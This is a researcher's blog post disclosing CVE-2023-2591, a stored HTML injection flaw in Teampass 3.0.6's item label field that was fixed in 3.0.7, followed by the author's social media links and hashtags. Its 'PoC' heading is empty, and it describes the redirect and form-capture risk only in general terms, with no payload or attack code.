CVE-2023-2591: Stored HTML Injection in Item Label in Teampass 3.0.6
I recently identified a security vulnerability in nilsteampassnet/teampass, a popular password management tool. This vulnerability, identified as CVE-2023–2591, is a stored HTML injection vulnerability in the item label field. If two users have the same folder access, malicious users can create an item where its label field is vulnerable to HTML injection. When other users see that item, it may force them to redirect to the attacker’s website or capture their data using a form.
PoC:
I reported this vulnerability to the nilsteampassnet/teampass team, and it was validated and fixed in version 3.0.7 with commit 57a977. The team also awarded me the disclosure bounty for my report.
The impact of this vulnerability could have been significant, as malicious actors could have exploited it to carry out HTML injection attacks, potentially redirecting other users to an attacker’s website or capturing their sensitive data through a form. This could result in the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. It could have also led to a wider breach of security, affecting other users who interact with the compromised item or website.
I want to stress the importance of regularly updating software and implementing secure coding practices to prevent such vulnerabilities. I hope my report will help raise awareness about the potential risks of such vulnerabilities and encourage users to take necessary precautions.
If you’re interested in learning more about my findings, check out the report link on
huntr.dev: https://huntr.dev/bounties/705f79f4-f5e3-41d7-82a5-f00441cd984b/
You can also follow me for updates on my research and other security-related topics.
Instagram — @mnqazi
Twitter — @mnqazi
Facebook — @mnqazi
LinkedIn: M_Nadeem_Qazi
Stay safe out there!
#securityresearch #pentesting #vulnerabilitymanagement #informationsecurity #cybersecurity #HTMLinjection #passwordmanagement #teampass #bugbounty #ethicalhacking #hacker #CVE_2023_2591 #mnqazi #infosec #securityawareness #cyberawareness #cyberdefense #cyberthreats
